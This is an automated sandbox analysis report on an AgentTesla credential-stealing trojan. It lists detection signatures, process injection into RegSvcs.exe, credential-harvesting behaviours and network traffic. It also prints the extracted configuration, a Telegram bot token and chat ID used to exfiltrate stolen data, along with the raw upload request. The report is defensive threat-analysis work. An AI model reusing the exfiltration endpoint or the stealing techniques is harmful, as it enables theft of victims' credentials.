Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g0PWOnCNZH.exe

Overview

General Information

Sample Name:g0PWOnCNZH.exe
Original Sample Name:87be1ac6122ed0c75b3af80696b9e686.exe
Analysis ID:830729
MD5:87be1ac6122ed0c75b3af80696b9e686
SHA1:28954d7b81380a52dc012eb21c4769fe54070a5c
SHA256:de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
Tags:32AgentTeslaexetrojan
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • g0PWOnCNZH.exe (PID: 5956 cmdline: C:\Users\user\Desktop\g0PWOnCNZH.exe MD5: 87BE1AC6122ED0C75B3AF80696B9E686)
    • RegSvcs.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegSvcs.exe PID: 6088JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegSvcs.exe PID: 6088JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.3149.154.167.220496854432851779 03/20/23-16:41:25.765012
            SID:2851779
            Source Port:49685
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: g0PWOnCNZH.exeVirustotal: Detection: 43%Perma Link
            Source: g0PWOnCNZH.exeReversingLabs: Detection: 26%
            Machine Learning detection for sample
            Source: g0PWOnCNZH.exeJoe Sandbox ML: detected
            Source: 0.2.g0PWOnCNZH.exe.41c9fd0.11.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}
            Source: RegSvcs.exe.6088.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.3:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49685 version: TLS 1.2
            Source: Binary string: HWrU.pdb source: g0PWOnCNZH.exe
            Source: Binary string: HWrU.pdbSHA256 source: g0PWOnCNZH.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49685 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            May check the online IP address of the machine
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfcHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
            Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
            Source: RegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: RegSvcs.exe, 00000001.00000002.523506282.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: g0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: g0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersB
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrito
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
            Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: g0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmR
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
            Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.U
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com2
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comTF
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comiv
            Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comq
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com(
            Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comw
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument
            Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
            Source: unknownHTTP traffic detected: POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfcHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api.ipify.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.3:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49685 version: TLS 1.2
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FA720
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FA780
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FC844
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FF1E8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_014FF1F8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F99D8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F9DE8
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F0360
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F0350
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F3B45
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F00B1
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F00C0
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B76478
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B7653D
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B7003A
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B76468
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B70040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9A958
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9C918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E99D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9A088
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E95A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642DCB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642AAF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0642EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_068DF2BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_068D0040
            Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.000000000419C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.300220026.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003F6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000000.249089263.0000000000A48000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exeBinary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
            Source: g0PWOnCNZH.exeVirustotal: Detection: 43%
            Source: g0PWOnCNZH.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\g0PWOnCNZH.exe C:\Users\user\Desktop\g0PWOnCNZH.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g0PWOnCNZH.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
            Source: g0PWOnCNZH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMutant created: \Sessions\1\BaseNamedObjects\tzZlkogNkifmSNDNRsGiYwDEq
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Binary string: HWrU.pdb source: g0PWOnCNZH.exe
            Source: Binary string: HWrU.pdbSHA256 source: g0PWOnCNZH.exe
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F7060 push eax; ret
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F352E push ecx; iretd
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F34DD pushfd ; iretd
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F391A pushad ; retf
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F2111 push B8FFFFE3h; iretd
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F3002 pushfd ; iretd
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_073F5889 pushfd ; retn 0000h
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeCode function: 0_2_07B73200 pushad ; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90050 push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9003D push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90420 push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90402 push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E90B58 push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06421A68 push edx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06421950 push edx; ret
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
